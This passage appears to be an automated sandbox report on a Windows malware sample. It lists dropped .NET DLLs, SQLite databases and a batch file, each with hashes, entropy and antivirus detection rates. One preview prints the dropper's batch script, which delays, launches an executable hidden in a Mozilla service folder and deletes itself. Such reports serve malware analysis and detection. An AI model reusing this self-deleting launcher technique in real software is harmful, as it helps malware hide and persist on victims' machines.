                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                Category:dropped
                                                                                                Size (bytes):196608
                                                                                                Entropy (8bit):1.121297215059106
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.136413900497188
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                Malicious:false
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):25
                                                                                                Entropy (8bit):4.483856189774723
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:0mTqBnIWnW:0JIgW
                                                                                                MD5:FE7877CE141589F960E5FE92F6C8C975
                                                                                                SHA1:23D104B683B2A82AA2320DB7F18CC276C3E4F6E2
                                                                                                SHA-256:F0B083780CA288D35D1EC2736023C6FBF84236496C9D137FE3C903E67881BA76
                                                                                                SHA-512:B464F62B59450F0B9A7B8B1B44AD0DDA314224EF3D209AE963124F3A7841E004DD5647C37D2DFFA6C36FEA32026F136C245BCDB08E5A8FA59DC79F4841722411
                                                                                                Malicious:false
                                                                                                Preview:et70NbJWRLXvskq0GbFmDrEB3
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):51200
                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                Malicious:false
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):266
                                                                                                Entropy (8bit):5.357952762053599
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:hCijTg3Nou1SV+DER5IlMx5siWx1il2p0ZKOZG1923frGH:HTg9uYDEfPDWxXarU
                                                                                                MD5:36913E5FAB76F648B300B9CF952DE3E8
                                                                                                SHA1:2C823F6F8F4AB631A6DC919FB21312AE91F2CB88
                                                                                                SHA-256:A0B1FC4AD7BB9557B07CC9956B7A20638C825FFAF16DBDADA3CBDD3E8A02E4C9
                                                                                                SHA-512:1C48FB943A8CE53BF734430066308F630B516E4A40E5FC2703500BC93E1A2BC8D3AE64BF661D5F6944AB592BCDF105B70893FF853F160E8B9046BAEACE0206B4
                                                                                                Malicious:false
                                                                                                Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\zuwFoSPM2u.bat"
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):33792
                                                                                                Entropy (8bit):5.541771649974822
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: lv961v43L3.exe, Detection: malicious
                                                                                                • Filename: RRjzYVukzs.exe, Detection: malicious
                                                                                                • Filename: FMd6ntIhQY.exe, Detection: malicious
                                                                                                • Filename: Q9AQFOA6YC.exe, Detection: malicious
                                                                                                • Filename: fdsN8iw6WG.exe, Detection: malicious
                                                                                                • Filename: I0xP0G2l1W.exe, Detection: malicious
                                                                                                • Filename: 5Aw2cV5m0c.exe, Detection: malicious
                                                                                                • Filename: AvQTFKdsST.exe, Detection: malicious
                                                                                                • Filename: jD1RqkyUNm.exe, Detection: malicious
                                                                                                • Filename: BdYcIFnY2J.exe, Detection: malicious
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24064
                                                                                                Entropy (8bit):5.4346552043530165
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                                                                MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                                                                SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                                                                SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                                                                SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 6%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24064
                                                                                                Entropy (8bit):5.492504448438552
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                                                                MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                                                                SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                                                                SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                                                                SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 46%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):46592
                                                                                                Entropy (8bit):5.870612048031897
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):9728
                                                                                                Entropy (8bit):5.0168086460579095
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):85504
                                                                                                Entropy (8bit):5.8769270258874755
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):22016
                                                                                                Entropy (8bit):5.41854385721431
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):33792
                                                                                                Entropy (8bit):5.541771649974822
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):23552
                                                                                                Entropy (8bit):5.529329139831718
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32256
                                                                                                Entropy (8bit):5.631194486392901
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24064
                                                                                                Entropy (8bit):5.4346552043530165
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                                                                MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                                                                SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                                                                SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                                                                SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 6%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):46592
                                                                                                Entropy (8bit):5.870612048031897
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):39936
                                                                                                Entropy (8bit):5.629584586954759
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):39936
                                                                                                Entropy (8bit):5.629584586954759
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32256
                                                                                                Entropy (8bit):5.631194486392901
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):22016
                                                                                                Entropy (8bit):5.41854385721431
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24576
                                                                                                Entropy (8bit):5.535426842040921
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
